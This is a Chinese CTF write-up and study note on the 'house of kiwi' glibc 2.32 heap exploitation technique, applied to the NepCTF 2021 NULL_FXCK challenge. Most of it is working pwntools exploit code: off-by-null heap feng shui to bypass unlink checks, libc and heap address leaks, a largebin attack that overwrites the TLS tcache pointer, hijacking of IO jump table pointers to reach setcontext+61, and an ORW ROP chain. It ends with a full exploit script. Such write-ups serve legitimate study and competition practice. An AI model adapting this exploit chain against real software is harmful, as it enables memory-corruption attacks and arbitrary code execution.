house-of-wiki学习以及复现

字数统计: 2.8k字   |   阅读时长≈ 13分

house of kiwi

提供了另一种刷新IO方式:__malloc_assert

1、setcontext+61的gadget

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<setcontext+61>:    mov    rsp,QWORD PTR [rdx+0xa0]
<setcontext+68>:    mov    rbx,QWORD PTR [rdx+0x80]
<setcontext+75>:    mov    rbp,QWORD PTR [rdx+0x78]
<setcontext+79>:    mov    r12,QWORD PTR [rdx+0x48]
<setcontext+83>:    mov    r13,QWORD PTR [rdx+0x50]
<setcontext+87>:    mov    r14,QWORD PTR [rdx+0x58]
<setcontext+91>:    mov    r15,QWORD PTR [rdx+0x60]
<setcontext+95>:    test   DWORD PTR fs:0x48,0x2
<setcontext+107>:    je     0x7ffff7e31156 <setcontext+294>
<setcontext+294>:    mov    rcx,QWORD PTR [rdx+0xa8]
<setcontext+301>:    push   rcx
<setcontext+302>:    mov    rsi,QWORD PTR [rdx+0x70]
<setcontext+306>:    mov    rdi,QWORD PTR [rdx+0x68]
<setcontext+310>:    mov    rcx,QWORD PTR [rdx+0x98]
<setcontext+317>:    mov    r8,QWORD PTR [rdx+0x28]
<setcontext+321>:    mov    r9,QWORD PTR [rdx+0x30]
<setcontext+325>:    mov    rdx,QWORD PTR [rdx+0x88]
<setcontext+332>:    xor    eax,eax
<setcontext+334>:    ret

主要关注的就是:

1
2
3
<setcontext+61>:    mov    rsp,QWORD PTR [rdx+0xa0]
<setcontext+294>:    mov    rcx,QWORD PTR [rdx+0xa8]
<setcontext+301>:    push   rcx

布置好rdx+0xa0 以及 rdx+0xa8 也就控制了rsp,后续ret就可以控制程序流了

2、IO

也是这周刚好参加国资社畜师傅的课,对IO了解的更详细些,这里是利用_malloc_assert去调用fflush函数,也就会执行跳表中的__sync指针

3、house of kiwi

因为进入IO的__sync之后会发现rdx固定为_IO_helper_jumps,所以控制_IO_helper_jumps+0xa0、_IO_helper_jumps+0xa8去调用setcontext+61就可以控制程序流img

使用条件

1、能够触发__malloc_assert (top_chunk不满足申请内存的size)
2、能够任意写,修改_IO_file_sync和IO_helper_jumps + 0xA0 and 0xA8
将__sync中地址修改为setcontext+61,将IO_helper_jumps+0xa0 和 +0xa8分别修改为orw和ret地址

[nepctf2021]NULL_FXCK

参考博客:

house of kiwi | Fang’s Blog!

[原创]从PWN题NULL_FXCK中学到的glibc知识

2.32 菜单堆题 沙盒禁用execv、保护全开 全是新知识 猛猛学

IDA:

进入菜单前:相当于ban掉了malloc_hook 以及 free_hookimg
add:申请大小 0x100~0x2000,输入会在最后做截断,没有溢出、也不能去连带打印chunk中内容img
Modify:(edit)存在off-by-null
img
delete:没有uaf漏洞
show:虽然用的write打印,但strlen是会截断00的
img

思路及过程(学习其他师傅wp)

堆风水绕过unlink检查

这题ban了hook、还禁用了execve 只能打orw,所以需要去控制程序流
有off-by-null,第一反应是去修改size然后unlink,不过没有uaf漏洞,这里就是考验极致的堆布置能力了。
首先是目的就是绕过unlink的检查:bck->fd == P ;fwd-> ==P ,以及要chunksize(P) == pre_size
当我们连续放入三个chunk时,中间的chunk1的fd、bk就布置好了,关键就在于chunk0的fd以及chunk2的bk

img

1
2
3
4
5
6
7
8
9
10
11
12
#这里多个chunk是为后续准备的
add(0x418)	#0
add(0x1f8)	#1
add(0x428)	#2	与chunk3合并,维护原chunk3的fd、bk
add(0x438)	#3
add(0x208)	#4
add(0x428)	#5
add(0x208)	#6
#三链 chunk3 fd--> chunk
delete(0)
delete(3)
delete(5)

img

因为只能通过add以及delete去修改堆中的内容,所以原chunk1肯定是不能去动的,这里巧妙的在chunk1上方多申请了一块chunk1_up,将这两块地址free合并再切割将原chunk1的fd、bk放到新chunk1_up的底部,当然为了后续操作方便,这里chunk大小的设置将chunk1的地址控制为00结尾,之后就可以将新chunk1地址链入chunk0 bk、chunk2 fd,然后修改末字节就可以达到目的

1
2
3
4
5
6
7
8
9
10
delete(2)	#会和chunk3 合并 (0x430+0x440 = 0x870)
#修改原chunk3的size、为之后unlink准备
#同时会将chunk0、chunk5放入largebin
pay = b'a'*0x428+p64(0xc91)
add(0x440,pay)	#切割chunk2、3合并chunk	0

add(0x418)	#chunk2、chunk3剩下部分	2
add(0x418)	#chunk0			3

add(0x428)	#chunk5			5

img

然后修改chunk0的bk、将新chunk1链入到chunk0,然后利用add中的截断去修改末字节

1
2
3
4
5
6
7
#修改原chunk0的bk
delete(3)	
delete(2)	
'''
原chunk0 -->bk chunk3+0x20
'''
add(0x418,b'a'*9)	#原chunk0	2

img

然后同样的去修改chunk2的bk

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
add(0x418)		#原chunk3+0x20	3

delete(3)
delete(5)
'''
原chunk5 -->fd chunk3+0x20
'''
#debug()

#把原chunk5以及chunk3+0x20放入largebin
#这里是因为从unsortedbin中取出的话,fd、bk会被修改
add(0x9f8)			#为unlink准备		3
'''
原chunk5 -->nextsize_fd chunk3+0x20
原chunk5 -->nextsize_bk chunk3+0x20
chunk3+0x20 -->nextsize_fd 原chunk5
chunk3+0x20 -->nextsize_bk 原chunk5
'''
add(0x428,b'\x00')	#chunk5-->fd 原chunk3	5

img

然后就可以修改pre_size 触发unlink,实现堆覆盖

1
2
3
4
5
6
7
8
9
10
11
12
13
#修改chunk7的pre_size=0xc90,size=0xa00
pay = b'a'*0x200 + p64(0xc90) + b'\x00'
edit(6,pay)

add(0x418)		#原chunk3+0x20		7
add(0x208)		#防止top_chukn合并	8

#这里3实际是原chunk7位置,向上合并到原chunk3
'''
fd : 原chunk5 --> 原chunk3 --> 原chunk0  
bk : 原chunk0 --> 原chunk3 --> 原chunk5 
'''
delete(3)	#---------unlink

pre_size in_use位 chunk的fd、bk都准备好了
img
img
unlink成功
后面截图地址与上面有偏差,一步步调到add(0x208)就断了 但直接断在后面就没问题 不清楚为什么qwq)
img

泄露地址

有了堆重叠,但地址还没泄露的,直接show的话末地址为00,泄露不出来,放入largebin再泄露

1
2
3
4
5
6
7
8
9
10
11
12
13
pay = flat(0,0,0,p64(0x421))
#伪造原chunk3+0x20的size、同时chunk4的fd、bk会放入main_arena+xxx
add(0x430,pay) 					#3
#将合并后的chunk放入largebin 然后就可以泄露地址了
add(0x1600)					#9

show(4)
libc_base = u64(io.recv(6).ljust(8,b'\x00'))-1680-0x1e3ba0
log.success("libc_base--->"+hex(libc_base))

show(5)
heap_adr = u64(io.recv(6).ljust(8,b'\x00'))-0x2b0
log.success("heap_adr--->"+hex(heap_adr))
任意地址写入的实现

现在虽然有了堆重叠,但chunk大小不能用到tcache bin,所以没办法任意地址写入,这里师傅提供了一种新方式,tcachebin会有一块存tcache struct的chunk,也就是heap_base的,而这块地址是存在TSL段的一块地址上
img
img
所以只要劫持该指针为我们可控制地址,就可以控制tcache,也就可以任意地址写入了
这里利用largebin attack向该指针写入堆块地址就可以了
这里提前在heap_adr+0x8e0处写入了 orw

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
pay = b'a'*0x208+p64(0x431)+b'a'*0x428+p64(0x211)+b'a'*0x208+p64(0xa01)
add(0x1240,pay)			#取走largebin		10
# 在heap_adr + 0x8e0 处放入orw
delete(0)
add(0x440,orw)			#		0

add(0x418)					#11
add(0x208)		#防止合并		12

delete(5)
delete(4)		#chunk4也是合并之后剩下的部分 size=0x1251

#通过之前的unlink达到的堆覆盖去修改chunk5的 nextsize_bk
pay = b'a'*0x208+p64(0x431)+p64(libc_base+0x1e3ff0)*2+p64(heap_adr+0x1350)+p64(TLS-0x20)
add(0x1240,pay)			#		4
delete(11)

add(0x500)		#----------largebin attack 	5
#向TLS写入了11的地址

img
imgimg

但是在gdb中查看不到,写好偏移,然后走house of kiwi就可以执行orw了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
add(0x410)			#11

delete(4)			
#恢復largebin
pay = b'a'*0x208+p64(0x431)+p64(libc_base+0x1e3ff0)*2+p64(heap_adr+0x1350)*2
add(0x1240,pay)
#原chunk5还在largebin  而tcahce struct被写为了原chunk4
#所以现在可以写chunk5去修改tcache struct内容
pay = b'\x01'*0x70
pay = pay.ljust(0xe8,b'\x00')+p64(io_file_jumps+0x60)
pay = pay.ljust(0x168,b'\x00')+p64(io_helper_jimps+0xa0)+p64(heap_adr+0x46f0)
add(0x420,pay)

#house of kiwi
add(0x100,p64(setcontext+61))		#这里会实现栈迁移
add(0x200,p64(target)+p64(ret))		#栈顶和rsp
add(0x210,p64(0)+p64(0x910))		#修改top_chunk的size

cmd(1)
io.recvuntil("(: Size: ")
io.sendline(str(0x1000))

io.recvuntil('flag')

img
malloc函数过程
img
imgimgimgimgimgimg

完整EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
from pwn import *		
context(log_level='debug',os='linux',arch='amd64')
pwnfile = './wiki'
io=process(pwnfile)
#io=remote('node4.buuoj.cn',25500)
elf = ELF(pwnfile)				
libc = ELF("./libc-2.32.so")

def debug():
	gdb.attach(io)
	pause()
def cmd(x):
	io.recvuntil(">> ")
	io.sendline(str(x))
def add(size,content=b'\x00'):
	cmd(1)
	io.recvuntil("(: Size: ")
	io.sendline(str(size))
	io.recvuntil("(: Content:")
	io.send(content)
def edit(idx,content):
	cmd(2)
	io.recvuntil("Index: ")
	io.sendline(str(idx))
	io.recvuntil("Content: ")
	io.sendline(content)
def show(idx):
	cmd(4)
	io.recvuntil("Index: ")
	io.sendline(str(idx))
def delete(idx):
	cmd(3)
	io.recvuntil("Index: ")
	io.sendline(str(idx))

# ban hook  2.32   保护全开     ban execv
#------------------------------------------------------- 泄漏地址
add(0x418)	#0
add(0x1f8)	#1
add(0x428)	#2	与chunk3合并,维护原chunk3的fd、bk
add(0x438)	#3
add(0x208)	#4
add(0x428)	#5
add(0x208)	#6

delete(0)
delete(3)
delete(5)

delete(2)	#会和chunk3 合并 (0x430+0x440 = 0x870)
#修改原chunk3的size、为之后unlink准备
#同时会将chunk0、chunk5放入largebin
pay = b'a'*0x428+p64(0xc91)
add(0x440,pay)	#切割chunk2、3合并chunk	0

add(0x418)	#chunk2、chunk3剩下部分	2
add(0x418)	#chunk0			3

add(0x428)	#chunk5			5

#原chunk3的fd、bk还存在 
'''
原chunk3 -->fd chunk0
原chunk3 -->bk chunk5
'''
#修改原chunk0的bk
delete(3)	
delete(2)	
'''
原chunk0 -->bk chunk3+0x20
'''
add(0x418,b'a'*9)	#原chunk0	2
#上面一步利用对输入末字节的截断把原chunkn0的bk末字节改为00,也就是原chunk0 bk-->原chunk3
add(0x418)		#原chunk3+0x20	3

delete(3)
delete(5)
'''
原chunk5 -->fd chunk3+0x20
'''

#把原chunk5以及chunk3+0x20放入largebin
#这里是因为从unsortedbin中取出的话,fd、bk会被修改
add(0x9f8)		#为unlink准备		3
'''
原chunk5 -->nextsize_fd chunk3+0x20
原chunk5 -->nextsize_bk chunk3+0x20
chunk3+0x20 -->nextsize_fd 原chunk5
chunk3+0x20 -->nextsize_bk 原chunk5
'''
add(0x428,b'\x00')	#chunk5-->fd 原chunk3	5

#这里修改的是实际第7个chunk 但序号为3
#修改的pre_size=0xc90,size=0xa00
pay = b'a'*0x200 + p64(0xc90) + b'\x00'
edit(6,pay)

add(0x418)		#原chunk3+0x20		7
add(0x208)		#防止top_chukn合并	8

#这里3实际是原chunk7位置,向上合并到原chunk3
'''
fd : 原chunk5 --> 原chunk3 --> 原chunk0  
bk : 原chunk0 --> 原chunk3 --> 原chunk5 
'''
delete(3)	#---------unlink
'''
原chunk3 到chunk7 都合并了
'''
#debug()
pay = flat(0,0,0,p64(0x421))
#修改原chunk3+0x20的size、同时chunk4的fd、bk会放入main_arena+xxx
add(0x430,pay) 					#3
#将合并后的chunk放入largebin 
add(0x1600)					#9

show(4)
libc_base = u64(io.recv(6).ljust(8,b'\x00'))-1680-0x1e3ba0
log.success("libc_base--->"+hex(libc_base))

show(5)
heap_adr = u64(io.recv(6).ljust(8,b'\x00'))-0x2b0
log.success("heap_adr--->"+hex(heap_adr))

#-------------------------------------  地址准备
'''
思路就是修改IO的跳转指针,然后fflush刷新IO链表
这里是修改 _IO_file_sync 指针为 setcontext+61 
去控制程序流执行orw
'''
io_file_jumps = libc_base + libc.symbols['_IO_file_jumps']
io_helper_jimps = libc_base + 0x1e48c0

setcontext = libc_base + libc.symbols['setcontext']
op = libc_base + libc.symbols['open']
re = libc_base + libc.symbols['read']
wr = libc_base + libc.symbols['write']
puts_adr = libc_base + libc.symbols['puts']

pop_rdi = libc_base + 0x02858f
pop_rsi = libc_base + 0x02ac3f
pop_rdx_rbx = libc_base + 0x01597d6
ret = libc_base + 0x026699

#--------------------------------------- 劫持TSL结构体去修改tcache struct地址  然后tcache struct attack
#debug()

#TLS = libc_base-0x2908
TLS = libc_base + 0x1eb578		#TSL段  这里存的是tcache struct attack地址

target = heap_adr + 0x8e0
flag_adr = target + 0x100

orw = flat(
	   pop_rdi,flag_adr,pop_rsi,0,op,
	   pop_rdi,3,pop_rsi,flag_adr,pop_rdx_rbx,0x100,0,re,
	   pop_rdi,1,pop_rsi,flag_adr,pop_rdx_rbx,0x40,0,wr
	   #pop_rdi,flag_adr,puts_adr
	   ).ljust(0x100,b'\x00')+b'flag\x00'

pay = b'a'*0x208+p64(0x431)+b'a'*0x428+p64(0x211)+b'a'*0x208+p64(0xa01)
add(0x1240,pay)			#取走largebin		10

# 在heap_adr + 0x8e0 处放入orw
delete(0)
add(0x440,orw)			#		0

add(0x418)					#11
add(0x208)		#防止合并		12

delete(5)
delete(4)		#chunk4也是合并之后剩下的部分 size=0x1251

#通过之前的unlink达到的堆覆盖去修改chunk5的 nextsize_bk
pay = b'a'*0x208+p64(0x431)+p64(libc_base+0x1e3ff0)*2+p64(heap_adr+0x1350)+p64(TLS-0x20)
add(0x1240,pay)			#		4
delete(11)

add(0x500)		#----------largebin attack 	5
#向TLS写入了11的地址

add(0x410)			#11

delete(4)			
#恢復largebin 后续还要malloc 不恢复会报错
pay = b'a'*0x208+p64(0x431)+p64(libc_base+0x1e3ff0)*2+p64(heap_adr+0x1350)*2
add(0x1240,pay)

#原chunk5还在largebin  而tcahce struct被写为了原chunk4
#所以现在可以写chunk5去修改tcache struct内容
pay = b'\x01'*0x70
pay = pay.ljust(0xe8,b'\x00')+p64(io_file_jumps+0x60)
pay = pay.ljust(0x168,b'\x00')+p64(io_helper_jimps+0xa0)+p64(heap_adr+0x46f0)
add(0x420,pay)

#house of kiwi
add(0x100,p64(setcontext+61))		#这里会实现栈迁移
add(0x200,p64(target)+p64(ret))		#rsp和rip
add(0x210,p64(0)+p64(0x910))		#修改top_chunk 
#当申请的大小大于top_chunk时会去执行_malloc_assret,这个函数会调用fflush,就会刷新IO链表
#也就是
cmd(1)
io.recvuntil("(: Size: ")
io.sendline(str(0x1000))
io.recvuntil('flag')
io.interactive()

扫一扫,分享到微信

小小pwner,可笑可笑